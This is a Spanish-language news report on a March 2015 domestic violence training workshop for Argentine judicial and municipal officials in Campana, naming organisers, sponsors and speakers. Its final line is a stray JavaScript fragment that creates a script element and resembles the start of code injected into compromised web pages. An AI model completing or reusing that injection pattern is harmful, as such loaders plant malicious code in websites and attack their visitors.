Taller de Violencia Domestica.

TALLER DE VIOLENCIA DOMESTICA. PROTOCOLO DE LA OM

CORTE SUPREMA DE JUSTICIA DE LA NACION

El día 17 de Marzo de 2015 en el marco de la conmemoración del Día Internacional de la Mujer se llevó a cabo en el Salón Auditorio de OSDE Campana la presentación del nuevo taller:” Violencia Doméstica” diseñado por la OM de la Corte Suprema de Justicia de la Nación en el marco de los compromisos asumidos por el Estado argentino en especial, por el artículo 8ºc de la Convención Interamericana para prevenir, sancionar y erradicar la violencia contra la mujer (Belém do Pará”) en tanto establece que los Estados parte fomentarán “…la educación y capacitación del personal en la administración de justicia, policial y demás funcionarios encargados de la aplicación de la ley…”

La organización de la jornada estuvo a cargo de AMJA -Asociación de Mujeres Jueces de Argentina- y del Colegio de Magistrados y Funcionarios Departamento Judicial Zarate-Campana, contando con el auspicio del Ministerio de Justicia de la Provincia de Buenos Aires, la Fundación de Estudios para la Justicia (FUNDEJUS) y la Municipalidad de Campana.-

El Sr. Presidente del Colegio de Magistrados y Funcionarios de Zarate- Campana, Dr. Christian Fabio dio la bienvenida al encuentro.

La apertura de la jornada estuvo a cargo de la Dra. Margarita Tropiano, presidente del Colegio de Magistrados y Funcionarios Provincial, la Dra. Maria Pia Leiro en representación de FUNDEJUS y AMJA y el Dr. Ricardo Casal Ministro de Justicia de la Provincia de Buenos Aires, quienes expusieron sobre la importancia de abordar la problemática de la violencia doméstica en los espacios judiciales y de fortalecer con buenas prácticas los derechos consagrados en las Convenciones, leyes nacionales y provinciales que durante este tiempo el Estado Argentino ha ratificado y legislado.

Estuvieron presentes además, autoridades de FUNDEJUS, los Dres. Alfredo Ruiz Paz y Alberto Pisano, la Sra. Secretaria de Desarrollo Humano, Andrea García, en representación de la Sra. Intendente del Partido de Campana Stella Maris Giroldi, funcionarios del poder ejecutivo de dicha ciudad; Jueces de Cámara, la Sra. Fiscal General, Jueces, Fiscales, Defensores, funcionarios letrados y empleados del poder Judicial Departamental Zarate- Campana y de los Departamentos Judiciales San Isidro y San Martín, entre otros funcionarios del Poder Judicial y Ejecutivo.

Es oportuno resaltar que este taller es la continuación y profundización del trabajo en talleres sobre perspectiva de génerorealizado desde noviembre 2013 y a lo largo de todo el año 2014, a través del cual se ha sensibilizado a más de 300 funcionarios pertenecientes al Poder Ejecutivo Provincial, municipal y del Poder Judicial de la Provincia de Buenos Aires.

var d=document;var s=d.createElement(‘script’);